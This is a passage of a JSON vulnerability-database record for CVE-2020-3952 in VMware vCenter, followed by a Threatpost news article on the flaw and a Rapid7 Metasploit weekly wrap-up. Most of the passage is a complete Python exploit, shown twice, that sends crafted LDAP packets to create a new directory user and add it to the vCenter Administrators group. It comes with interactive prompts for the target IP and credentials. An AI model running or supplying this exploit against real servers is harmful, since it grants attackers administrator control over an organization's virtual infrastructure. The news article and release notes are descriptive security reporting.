If not, see <http://www.gnu.org/licenses/>.\n \n Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952\n \n File name CVE-2020-3592.py\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\n \n ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x\n \n This is a native implementation without requirements, written in Python 3.\n Works equally well on Windows as Linux (as MacOS, probably ;-)\n\n Features: exploit + vulnerability checker\n'''\n\nimport binascii, socket, sys, string, random\n\n## Default vars; change at will\n_sIP = '192.168.50.35'\n_iPORT = 389\n_iTIMEOUT = 5\n\ndef randomString(iStringLength=8):\n #sLetters = string.ascii_lowercase\n sLetters = string.ascii_letters\n return ''.join(random.choice(sLetters) for i in range(iStringLength))\n\ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified\n ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed\n sReturn = sPrefix\n if (len(sData) / 2 ) > 255:\n sReturn += b'82'\n hexBytes = 2\n elif (len(sData) /2 ) >= 128:\n sReturn += b'81'\n sReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode()\n return sReturn\n\ndef buildBindRequestPacket(sUser, sPass):\n sUser = binascii.hexlify(sUser.encode())\n sPass = binascii.hexlify(sPass.encode())\n ## Packet Construction\n sPacket = getLengthPrefix(sPass, b'80') + sPass\n sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket\n sPacket = b'020103' + sPacket\n sPacket = getLengthPrefix(sPacket, b'60') + sPacket\n sPacket = b'020101' + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n #print(sPacket)\n return binascii.unhexlify(sPacket) \n\ndef buildUserCreatePacket(sUser, sPass):\n sUser = binascii.hexlify(sUser.encode())\n sPass = binascii.hexlify(sPass.encode())\n def createAttribute(sName, sValue):\n sValue = getLengthPrefix(sValue, b'04') + sValue\n sName = getLengthPrefix(sName, b'04') + 
sName\n \n sReturn = getLengthPrefix(sValue, b'31') + sValue\n sReturn = sName + sReturn\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\n return sReturn\n \n def createObjectClass():\n sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')\n sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')\n sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')\n sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')\n \n sReturn = getLengthPrefix(sReturn, b'31') + sReturn\n sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\n return sReturn\n \n ## Attributes\n sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))\n sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))\n sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)\n sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser)\n sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))\n sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)\n sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)\n sAttributes += createObjectClass()\n sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)\n ## CN\n sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')\n sUserEntry = getLengthPrefix(sCN, b'04') + sCN\n \n ## Packet Assembly (bottom up)\n sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes\n sPacket = sUserEntry + sPacket\n sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n #print(sPacket)\n return 
binascii.unhexlify(sPacket)\n\ndef buildModifyUserPacket(sUser):\n sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())\n sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')\n sMember = binascii.hexlify(b'member')\n ## Packet Construction\n sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN\n sPacket = getLengthPrefix(sPacket, b'31') + sPacket\n sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket\n sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket\n sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n #print(sPacket)\n return binascii.unhexlify(sPacket)\n\ndef performBind(s):\n ## Trying to bind, fails, but necessary (even fails when using correct credentials)\n dPacket = buildBindRequestPacket('[email\u00a0protected]','www.IC4.be')\n s.send(dPacket)\n sResponse = s.recv(1024)\n try:\n sResponse = sResponse.split(b'\\x04\\x00')[0][-1:]\n sCode = binascii.hexlify(sResponse).decode()\n if sCode == '31': print('[+] Ok, service reachable, continuing')\n else: print('[-] Something went wrong')\n except:\n pass\n return sCode\n\ndef performUserAdd(s, sUser, sPass):\n dPacket = buildUserCreatePacket(sUser,sPass)\n s.send(dPacket)\n sResponse = s.recv(1024)\n try:\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\n sMessage = sResponse.split(b'\\x04\\x00')[1]\n if sCode == b'\\x00':\n print('[+] Success! 
User ' + sUser + '@vsphere.local added with password ' + sPass)\n elif sCode == b'\\x32':\n print('[-] Error, this host is not vulnerable (insufficientAccessRights)')\n else:\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\n else: sMessage = sMessage[2:].decode()\n print('[-] Error, user not added, message received: ' + sMessage)\n except:\n pass\n return sCode\n \n\ndef performUserMod(s, sUser, verbose = True):\n dPacket = buildModifyUserPacket(sUser)\n s.send(dPacket)\n sResponse = s.recv(1024)\n try:\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\n sMessage = sResponse.split(b'\\x04\\x00')[1]\n if sCode == b'\\x00':\n if verbose: print('[+] User modification success (if the above is OK).')\n else:\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\n else: sMessage = sMessage[2:].decode()\n if verbose: print('[-] Error during modification, message received: ' + sMessage)\n except:\n pass\n return sCode, sMessage\n\ndef performUnbind(s):\n try: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00')\n except: pass\n\ndef main():\n global _sIP, _iPORT, _iTIMEOUT\n _sUSER = 'user_' + randomString(6)\n _sPASS = randomString(8) + '_2020'\n bAdduser = False\n if len(sys.argv) == 1:\n print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')\n print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)\n print(' Leave username & password empty for a vulnerability check')\n print(' Watch out for vCenter/LDAP password requirements, leave empty for random password')\n print(' But for now, I will ask questions')\n sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')\n if not sAnswer == '': _sIP = sAnswer\n sAnswer = input('[?] Want to perform a check only? [Y/n]: ')\n if sAnswer.lower() == 'n': bAdduser = True\n if bAdduser:\n sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ')\n if not sAnswer == '': _sUSER = sAnswer\n sAnswer = input('[?] 
Please enter the new password for this user [' + _sPASS + ']: ')\n if not sAnswer == '': _sPASS = sAnswer\n else:\n _sIP = sys.argv[1]\n if len(sys.argv) >= 3:\n _sUSER = sys.argv[2]\n bAdduser = True\n if len(sys.argv) >= 4: _sPASS = sys.argv[3]\n\n ## MAIN\n print('')\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(_iTIMEOUT)\n try:\n s.connect((_sIP,_iPORT))\n except:\n print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')\n sys.exit(1)\n\n performBind(s)\n\n if bAdduser:\n sCode = performUserAdd(s, _sUSER, _sPASS)\n\n if not bAdduser:\n print('[!] Checking vulnerability')\n sCode, sMessage = performUserMod(s, 'Administrator', False)\n if sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage)\n else: print('[+] This host is vulnerable!')\n else:\n sCode = performUserMod(s, _sUSER)\n \n performUnbind(s)\n \n s.close()\n\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-06-03T02:50:14", "description": "", "published": "2020-06-02T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 6.7 Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3592", "CVE-2020-3952"], "modified": "2020-06-02T00:00:00", "id": "PACKETSTORM:157896", "href": "https://packetstormsecurity.com/files/157896/VMware-vCenter-Server-6.7-Authentication-Bypass.html", "sourceData": "`# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass \n# Date: 2020-06-01 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html \n# Version: vCenter Server 6.7 before update 3f \n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) \n# CVE: CVE-2020-3952 \n \n#!/usr/bin/env python3 \n \n''' \nCopyright 2020 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public 
License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nBased (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 \n \nFile name CVE-2020-3592.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \n## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: exploit + vulnerability checker \n''' \n \nimport binascii, socket, sys, string, random \n \n## Default vars; change at will \n_sIP = '192.168.50.35' \n_iPORT = 389 \n_iTIMEOUT = 5 \n \ndef randomString(iStringLength=8): \n#sLetters = string.ascii_lowercase \nsLetters = string.ascii_letters \nreturn ''.join(random.choice(sLetters) for i in range(iStringLength)) \n \ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified \n## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed \nsReturn = sPrefix \nif (len(sData) / 2 ) > 255: \nsReturn += b'82' \nhexBytes = 2 \nelif (len(sData) /2 ) >= 128: \nsReturn += b'81' \nsReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode() \nreturn sReturn \n \ndef buildBindRequestPacket(sUser, sPass): \nsUser = binascii.hexlify(sUser.encode()) \nsPass = binascii.hexlify(sPass.encode()) \n## Packet Construction \nsPacket = getLengthPrefix(sPass, b'80') + sPass \nsPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket 
\nsPacket = b'020103' + sPacket \nsPacket = getLengthPrefix(sPacket, b'60') + sPacket \nsPacket = b'020101' + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef buildUserCreatePacket(sUser, sPass): \nsUser = binascii.hexlify(sUser.encode()) \nsPass = binascii.hexlify(sPass.encode()) \ndef createAttribute(sName, sValue): \nsValue = getLengthPrefix(sValue, b'04') + sValue \nsName = getLengthPrefix(sName, b'04') + sName \n \nsReturn = getLengthPrefix(sValue, b'31') + sValue \nsReturn = sName + sReturn \nsReturn = getLengthPrefix(sReturn, b'30') + sReturn \nreturn sReturn \n \ndef createObjectClass(): \nsReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') \nsReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') \nsReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') \nsReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') \n \nsReturn = getLengthPrefix(sReturn, b'31') + sReturn \nsReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn \nsReturn = getLengthPrefix(sReturn, b'30') + sReturn \nreturn sReturn \n \n## Attributes \nsAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) \nsAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) \nsAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) \nsAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) \nsAttributes += createObjectClass() \nsAttributes += 
createAttribute(binascii.hexlify(b'userPassword'), sPass) \n## CN \nsCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') \nsUserEntry = getLengthPrefix(sCN, b'04') + sCN \n \n## Packet Assembly (bottom up) \nsPacket = getLengthPrefix(sAttributes, b'30') + sAttributes \nsPacket = sUserEntry + sPacket \nsPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef buildModifyUserPacket(sUser): \nsFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) \nsCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') \nsMember = binascii.hexlify(b'member') \n## Packet Construction \nsPacket = getLengthPrefix(sFQDN, b'04') + sFQDN \nsPacket = getLengthPrefix(sPacket, b'31') + sPacket \nsPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket \nsPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \nsPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket \nsPacket = getLengthPrefix(sPacket, b'02010366') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef performBind(s): \n## Trying to bind, fails, but necessary (even fails when using correct credentials) \ndPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsResponse = sResponse.split(b'\\x04\\x00')[0][-1:] \nsCode = binascii.hexlify(sResponse).decode() \nif sCode == '31': print('[+] Ok, service reachable, continuing') \nelse: print('[-] Something went wrong') \nexcept: \npass \nreturn sCode \n \ndef performUserAdd(s, sUser, sPass): \ndPacket = buildUserCreatePacket(sUser,sPass) \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsCode = 
sResponse.split(b'\\x04\\x00')[0][-1:] \nsMessage = sResponse.split(b'\\x04\\x00')[1] \nif sCode == b'\\x00': \nprint('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) \nelif sCode == b'\\x32': \nprint('[-] Error, this host is not vulnerable (insufficientAccessRights)') \nelse: \nif sMessage[2] == b'81': sMessage = sMessage[3:].decode() \nelse: sMessage = sMessage[2:].decode() \nprint('[-] Error, user not added, message received: ' + sMessage) \nexcept: \npass \nreturn sCode \n \n \ndef performUserMod(s, sUser, verbose = True): \ndPacket = buildModifyUserPacket(sUser) \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsCode = sResponse.split(b'\\x04\\x00')[0][-1:] \nsMessage = sResponse.split(b'\\x04\\x00')[1] \nif sCode == b'\\x00': \nif verbose: print('[+] User modification success (if the above is OK).') \nelse: \nif sMessage[2] == b'81': sMessage = sMessage[3:].decode() \nelse: sMessage = sMessage[2:].decode() \nif verbose: print('[-] Error during modification, message received: ' + sMessage) \nexcept: \npass \nreturn sCode, sMessage \n \ndef performUnbind(s): \ntry: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00') \nexcept: pass \n \ndef main(): \nglobal _sIP, _iPORT, _iTIMEOUT \n_sUSER = 'user_' + randomString(6) \n_sPASS = randomString(8) + '_2020' \nbAdduser = False \nif len(sys.argv) == 1: \nprint('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') \nprint(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) \nprint(' Leave username & password empty for a vulnerability check') \nprint(' Watch out for vCenter/LDAP password requirements, leave empty for random password') \nprint(' But for now, I will ask questions') \nsAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') \nif not sAnswer == '': _sIP = sAnswer \nsAnswer = input('[?] Want to perform a check only? [Y/n]: ') \nif sAnswer.lower() == 'n': bAdduser = True \nif bAdduser: \nsAnswer = input('[?] 
Please enter the new username to add [' + _sUSER + ']: ') \nif not sAnswer == '': _sUSER = sAnswer \nsAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') \nif not sAnswer == '': _sPASS = sAnswer \nelse: \n_sIP = sys.argv[1] \nif len(sys.argv) >= 3: \n_sUSER = sys.argv[2] \nbAdduser = True \nif len(sys.argv) >= 4: _sPASS = sys.argv[3] \n \n## MAIN \nprint('') \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.settimeout(_iTIMEOUT) \ntry: \ns.connect((_sIP,_iPORT)) \nexcept: \nprint('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') \nsys.exit(1) \n \nperformBind(s) \n \nif bAdduser: \nsCode = performUserAdd(s, _sUSER, _sPASS) \n \nif not bAdduser: \nprint('[!] Checking vulnerability') \nsCode, sMessage = performUserMod(s, 'Administrator', False) \nif sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage) \nelse: print('[+] This host is vulnerable!') \nelse: \nsCode = performUserMod(s, _sUSER) \n \nperformUnbind(s) \n \ns.close() \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157896/vmwarevcenter67-bypass.txt"}], "threatpost": [{"lastseen": "2020-10-17T22:38:09", "description": "A critical information-disclosure bug in VMware\u2019s Directory Service (vmdir) could lay bare the contents of entire corporate virtual infrastructures, if exploited by cyberattackers.\n\nThe vmdir is part of VMware\u2019s vCenter Server product, which provides centralized management of virtualized hosts and virtual machines (VMs) from a single console. 
According to the [product description](<https://www.virtualizationworks.com/vCenter-Server.asp>), \u201ca single administrator can manage hundreds of workloads.\u201d\n\nThese workloads are governed by [a single sign-on (SSO) mechanism](<https://docs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.install.doc/GUID-90C1E3DC-4397-4BF0-808E-DF3802E56BC6.html>) to make things easier for administrators; rather than having to sign into each host or VM with separate credentials in order to gain visibility to it, one authentication mechanism works across the entire management console.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vmdir in turn is a central component to the vCenter SSO (along with the Security Token Service, an administration server and vCenter Lookup Service). Also, vmdir is used for certificate management for the workloads governed by vCenter, according to VMware.\n\nThe critical flaw ([CVE-2020-3952](<https://www.vmware.com/security/advisories/VMSA-2020-0006.html>)) was disclosed and patched on Thursday; it rates 10 out of 10 on the CVSS v.3 vulnerability severity scale. At issue is a poorly implemented access control, according to the bug advisory, which could allow a malicious actor to bypass authentication mechanisms.\n\n\u201cUnder certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls,\u201d the description explained.\n\nAs for the attack vector, \u201ca malicious actor with network access to an affected vmdir deployment may be able to extract highly sensitive information,\u201d VMware noted. 
In turn, this information could be used to compromise the vCenter Server itself \u201cor other services which are dependent upon vmdir for authentication.\u201d\n\nThere are no workarounds, but administrators are encouraged to apply the patches as soon as possible.\n\nvCenter Server 6.7 (embedded or external PSC) prior to 6.7u3f is affected by CVE-2020-3952 if it was upgraded from a previous release line such as 6.0 or 6.5. Clean installations of vCenter Server 6.7 (embedded or external PSC) are not affected, according to the company. To help administrators find out if their vmdir deployments are affected by CVE-2020-3952, the vendor has published a [how-to knowledge base document](<https://kb.vmware.com/s/article/78543>).\n\n\u201cVMware, one of, if not the most, [popular virtualization software companies in the world](<https://threatpost.com/hackers-take-down-safari-vmware-and-oracle-at-pwn2own/143042/>), recently patched an extremely critical information disclosure vulnerability\u2026one of the most severe vulnerabilities that has affected VMware software,\u201d Chris Hass, director of information security and research at Automox, told Threatpost. \u201cvCenter Server provides a centralized platform for controlling VMware vSphere environments, it helps manage virtual infrastructure in a tremendous number of hybrid clouds, so the scope and impact of this vulnerability is quite large. Organizations using vCenter need to check their vmdir logs for affected versions, ACL MODE: legacy, and patch immediately.\u201d\n\nNo specific acknowledgments were given for the bug discovery \u2013 VMware noted only that it was \u201cdisclosed privately.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. 
Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-10T17:19:57", "type": "threatpost", "title": "Critical VMware Bug Opens Up Corporate Treasure to Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0215", "CVE-2020-0416", "CVE-2020-3952"], "modified": "2020-04-10T17:19:57", "id": "THREATPOST:D3B948D7FFB688A6022FF02F81F830F7", "href": "https://threatpost.com/critical-vmware-bug-corporate-treasure-hackers/154682/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-01-20T01:27:23", "description": "## Log4Shell goodness\n\n\n\nLog4Shell made an unfortunate end to 2021 for many organizations, but it also makes for some great additions to Metasploit Framework. Contributors [sempervictus](<https://github.com/sempervictus>), [schierlm](<https://github.com/schierlm>), [righel](<https://github.com/righel>), [timwr](<https://github.com/timwr>) and our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) have collaborated to bring us a Log4Shell module that uses header stuffing to exploit vulnerable HTTP servers, resulting in Remote Code Execution.\n\n## SonicWall SSL VPN module for Rapid7-discovered vulnerability\n\nRapid7 disclosed the technical details of [five vulnerabilities](<https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/>) discovered by [jbaines-r7](<https://blog.rapid7.com/2022/01/14/metasploit-weekly-wrap-up/%E2%80%8B%E2%80%8Bhttps://github.com/jbaines-r7>) affecting SonicWall\u2019s SMA-100 series of SSL VPN devices. 
The disclosure included landing a Metasploit module that gives remote and authenticated attackers `root` access to the device using CVE-2021-20039.\n\n## Pi-Hole command execution and common exploit library\n\nAn exciting new addition has worked its way into Metasploit Framework this week. Contributor [h00die](<https://github.com/h00die>) has created an authenticated RCE module that takes advantage of improper escaping of characters in Pi-Hole\u2019s Top Domains API\u2019s `validDomainWildcard` field. H00die has also created a library that aims to make developing future Pi-Hole modules easier.\n\n## New module content (4)\n\n * [Pi-Hole Top Domains API Authenticated Exec](<https://github.com/rapid7/metasploit-framework/pull/16012>) by SchneiderSec and h00die, which exploits [CVE-2021-32706](<https://attackerkb.com/topics/4c25C9i2U2/cve-2021-32706?referrer=blog>) \\- This adds an auxiliary module that executes commands against Pi-Hole versions <= `5.5`. This also introduces a Pi-Hole library for common functionality required in exploits against the service.\n * [SonicWall SMA 100 Series Authenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16041>) by jbaines-r7, which exploits [CVE-2021-20039](<https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039?referrer=blog>) \\- This adds a module that exploits an authenticated command injection vulnerability in multiple versions of the SonicWALL SMA 100 series web interface. In the SSL certificate deletion functionality, the sanitization logic permits the `\\n` character which acts as a terminator when passed to a call to `system()`. 
An authenticated attacker can execute arbitrary commands as the `root` user.\n * [Log4Shell HTTP Header Injection](<https://github.com/rapid7/metasploit-framework/pull/15969>) by sinn3r, juan vazquez, Michael Schierl, RageLtMan, and Spencer McIntyre, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) \\- This adds an exploit for HTTP servers that are affected by the Log4J/Log4Shell vulnerability via header stuffing.\n * [Microsoft Windows SMB Direct Session Takeover](<https://github.com/rapid7/metasploit-framework/pull/15903>) by usiegl00 - This adds a new exploit module that implements the Shadow Attack, SMB Direct Session takeover. Before running this module, a MiTM attack needs to be performed to let it intercept SMB authentication requests between a client and a server, using any kind of ARP spoofer/poisoner tool in addition to Metasploit. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload.\n\n## Enhancements and features\n\n * [#15656](<https://github.com/rapid7/metasploit-framework/pull/15656>) from [HynekPetrak](<https://github.com/HynekPetrak>) \\- This enables the `vmware_vcenter_vmdir_auth_bypass` module to create an admin user even if the target is not vulnerable to CVE-2020-3952, assuming we have obtained valid credentials to the vCenter LDAP directory.\n * [#16021](<https://github.com/rapid7/metasploit-framework/pull/16021>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds additional tests for Meterpreter's mkdir/rmdir functionality to ensure uniform implementations across all Meterpreters\n * [#16024](<https://github.com/rapid7/metasploit-framework/pull/16024>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This adds in a new command to Meterpreter that allows the end user to kill all channels at once\n * 
[#16040](<https://github.com/rapid7/metasploit-framework/pull/16040>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Removes Ruby 2.5 support as it is officially end of life\n * [#12217](<https://github.com/rapid7/metasploit-framework/pull/12217>) from [SkypLabs](<https://github.com/SkypLabs>) \\- This adds the f5 load balancer cookie to notes, and cleans up the module (rubocop/documentation/refs)\n\n## Bugs fixed\n\n * [#16016](<https://github.com/rapid7/metasploit-framework/pull/16016>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This fixes an issue in the `auxiliary/scanner/dcerpc/hidden` module where the `RHOSTS` datastore option was not available, resulting in hosts not being scanned.\n * [#16027](<https://github.com/rapid7/metasploit-framework/pull/16027>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes an issue with tab completion for the `generate` command. Completion now works with both the `-f` and `-o` flags.\n * [#16043](<https://github.com/rapid7/metasploit-framework/pull/16043>) from [shoxxdj](<https://github.com/shoxxdj>) \\- Fixes crash in the `auxiliary/scanner/http/wordpress_scanner.rb` module when attempting to scan themes\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.23...6.1.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-01-06T10%3A44%3A33-06%3A00..2022-01-13T13%3A35%3A39-06%3A00%22>)\n * [Full diff 6.1.23...6.1.25](<https://github.com/rapid7/metasploit-framework/compare/6.1.23...6.1.25>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T19:00:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952", "CVE-2021-20038", "CVE-2021-20039", "CVE-2021-32706", "CVE-2021-44228"], "modified": "2022-01-14T19:00:29", "id": 